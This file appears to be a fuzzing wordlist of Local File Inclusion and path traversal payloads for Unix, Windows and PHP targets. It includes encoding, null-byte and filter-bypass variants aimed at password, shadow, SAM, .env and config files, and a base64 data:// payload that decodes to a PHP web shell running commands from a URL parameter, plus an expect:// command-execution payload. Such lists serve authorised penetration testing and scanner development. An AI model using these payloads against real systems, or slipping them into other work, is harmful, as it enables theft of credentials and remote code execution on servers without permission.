# Local File Inclusion / Path Traversal payloads — OWASP A01:2021 + A03:2021
# Coverage: Unix/Linux targets, Windows targets, encoding bypass,
#           null-byte injection, truncation, filter bypass, wrapper abuse

# ── Unix classic traversal ────────────────────────────────────────────────────
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../etc/group
../../../etc/hostname
../../../etc/issue
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/exe
../../../proc/self/maps
../../../proc/version
../../../usr/local/apache/logs/access.log
../../../var/log/apache/access.log
../../../var/log/apache2/access.log
../../../var/log/nginx/access.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/mail/root
../../../var/www/html/.env

# ── Windows classic traversal ─────────────────────────────────────────────────
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\windows\system.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\windows\repair\sam
..\..\windows\repair\sam
..\windows\repair\system
..\windows\repair\security
..\inetpub\wwwroot\web.config
..\..\inetpub\wwwroot\web.config
..\..\..\inetpub\logs\LogFiles\W3SVC1\
../windows/win.ini
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini

# ── URL-encoded traversal ─────────────────────────────────────────────────────
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%afetc%c0%afpasswd
..%c1%9cetc%c1%9cpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd

# ── Null-byte injection (PHP < 5.3.4) ────────────────────────────────────────
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd%00.php
../../../etc/hosts%00

# ── Filter bypass (traversal with embedded patterns) ─────────────────────────
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..././..././..././etc/passwd
...//...//.../etc/passwd
/etc/./passwd
/etc//passwd
/./etc/passwd
/etc/passwd.
/etc/passwd/./

# ── Absolute path injection (no traversal needed) ────────────────────────────
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/hostname
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/self/exe
/proc/version
/var/log/auth.log
/var/log/syslog
/windows/win.ini
/windows/system.ini
/boot.ini
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini

# ── PHP wrapper abuse ─────────────────────────────────────────────────────────
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/read=convert.base64-encode/resource=../../config.php
php://input
php://stdin
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
expect://id
file:///etc/passwd

# ── Log poisoning candidates (requires log write + LFI) ──────────────────────
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/nginx/access.log
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/dev/fd/0
/proc/self/environ
